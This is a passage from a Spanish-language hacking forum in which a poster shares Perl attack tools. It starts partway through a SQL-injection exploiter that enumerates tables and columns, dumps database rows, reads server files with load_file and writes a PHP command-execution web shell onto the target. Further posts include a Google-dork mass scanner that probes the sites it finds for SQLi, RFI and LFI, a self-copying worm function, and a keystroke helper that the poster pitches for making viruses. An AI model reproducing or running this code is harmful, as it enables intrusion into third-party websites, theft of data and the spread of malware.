print "\n[-] mysql.user = ERROR\n";
}}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++; 
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) { 
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){ 
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1; 
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) { 
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n"; 
} else {
print "\n\n[+] Extracting Finish\n"; 
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub finish {
&copyright;
<STDIN>;
exit(1);
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 	
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com] 
#The end

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/k0bra/

#495

Perl / [Perl] G00gl3nator By Doddy H

Julio 03, 2011, 09:45:53 PM

Bueno ,este es un scanner en su version grafica ,este programa puede scanear

SQLI
RFI
LFI

Full Source Discloure

Tambien pueden buscar en google string en google con , los resultados
son guardados en una carpeta que el programa instalar al ejecutarse

Código: perl


#!usr/bin/perl
#Googlenator (C) Doddy Hackman 2011

use Tk;
use Tk::ROText;
use Tk::FileSelect;
use URI::Split qw(uri_split);
use Cwd;
use WWW::Mechanize;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $nave = WWW::Mechanize->new(autocheck => 0);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

installer();

my $new = MainWindow->new(-background=>"black");

$new->title("Googlenator (C) Doddy Hackman 2011");
$new->geometry("780x530");
$new->resizable(0,0);

$d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
$d->pack(-side=>"top",-fill=>"x");

$scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
$scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
$scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
$scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

$logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
$logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
$logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
$logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
$logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
head();

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

$new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

$new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
$new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
$new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");
	
MainLoop;

head();

sub googler {

my $google = $google->get;
my $pages = $pages->get;
my $dorks = $dorks->get;

head();

$box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

my @webas = google($google,$dorks,$pages);

$box->insert("end","\t\t[+] Cleaning\n\n");
$box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

for(@webas) {
$new->update();
$box->insert("end","\t\t[Link] : ".$_."\n");
savefile($dorks.".txt",$_);
}

$box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
$box->insert("end","\t\t[+] Finished\n\n");
	
}

sub loadsql {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scansql($page);
}

sub scansql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
$box->insert("end","\t\t[+] SQLI : $page\n");
savefilevul("sql-logs.txt",$page);
}}}

sub loadrfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanrfi($page);
}

sub scanrfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
$box->insert("end","\t\t[+] RFI : $page\n");
savefilevul("rfi-logs.txt",$page);
}}}

sub loadlfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanlfi($page);
}


sub scanlfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$box->insert("end","\t\t[+] LFI : $page\n");
savefilevul("lfi-logs.txt",$page);
}}}

sub loadfsd {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanfsd($page);
}

sub scanfsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
$box->insert("end","\t\t[+] Full Source Discloure : $page\n");
savefilevul("fsd-logs.txt",$page);
}}}}

sub head {

$box->delete("0.0","end");

$box->insert("end","
           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@ 
         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@ 
         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@  
         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@ 
           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@



	
");
}

sub about {
$about = MainWindow->new(-background=>"black");
$about->title("Googlenator v0.3");
$about->geometry("300x110");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
}

sub exitx {
exit(1);
}

sub savefilevul {
open (SAVE,">>logs/vulz/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub toma {
return $nave->get($_[0])->content;
}

sub dame_link {
return $nave->find_all_links();
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open (SAVE,">>logs/search/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub google {

for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
$new->update();
toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
@links = dame_link();
for my $l(@links) {
if ($l->url() =~/webcache.googleusercontent.com/) {
push(@url,$l->url());
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub installer {

unless (-d "logs/") {
mkdir("logs/","777");
mkdir("logs/search","777");
mkdir("logs/vulz","777");
}
}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub loadgoogle {
system("start ".getcwd()."/logs/search/");
}

sub loadfilesql {
system("start logs/vulz/sql-logs.txt");
}


sub loadfilelfi {
system("start logs/vulz/lfi-logs.txt");
}


sub loadfilerfi {
system("start logs/vulz/rfi-logs.txt");
}


sub loadfilefsd {
system("start logs/vulz/fsd-logs.txt");
}

# ¿ The End ?

#496

Perl / [Perl] Funcion writeword()

Julio 03, 2011, 09:45:38 PM

Hola , con esta funcion podran ejecutar word y escribir el texto que quieran, muy
util si quieren hacer un virus

Código: perl


#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

sub loadword {

system("start winword.exe");

sleep 4;

SendKeys($_[0]); 

}

Ejemplo de uso

Código: perl


loadword("Hola a todos");

#497

Perl / [Perl] Funcion wormer()

Julio 03, 2011, 09:45:25 PM

con esta funcion podran reproducir un archivo por todas las unidades disponibles

Código: perl


#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}

Ejemplo de uso

Código: perl



wormear($0);

#498

Perl / [Perl] Funcion Speak()

Julio 03, 2011, 09:45:15 PM

Hola a todos , con esta simple funcion vamos a lograr que nuestra computadora logre hablar y nos
diga lo que queremos , aunque solo puede hablar bien en ingles

Código: perl


#By Doddy H

use Win32::OLE;

sub speak {


my $habla = Win32::OLE->new("SAPI.SpVoice");

$habla->Speak($_[0],0);

}

Ejemplo de uso

Código: perl


speak("Hi brother");

#499

Perl / [Perl] Funcion screensave()

Julio 03, 2011, 09:45:05 PM

Hola a todos.

Con este funcion podran sacar una foto del sistema

Código: perl



#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

capture_window();

sub capture_window {

SendKeys("%{PRTSCR}"); 

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">foto.bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

}

Ejemplo de uso

Código: perl


capture_window()

Y tendran la foto con el nombre de foto.bmp

#500

Perl / [Perl] Funcion savefile()

Julio 03, 2011, 09:44:43 PM

Hola , con esta funcion podran crear un archivo y escribir en el
Si el archivo ya existe solo escribe y no lo borra

Código: perl


#By Doddy H
sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 
}

Ejemplo de uso

Código: perl


savefile("C:\\Windows\\Logs\\file.txt","hola")

Páginas 1 ... 23 24 25 26 27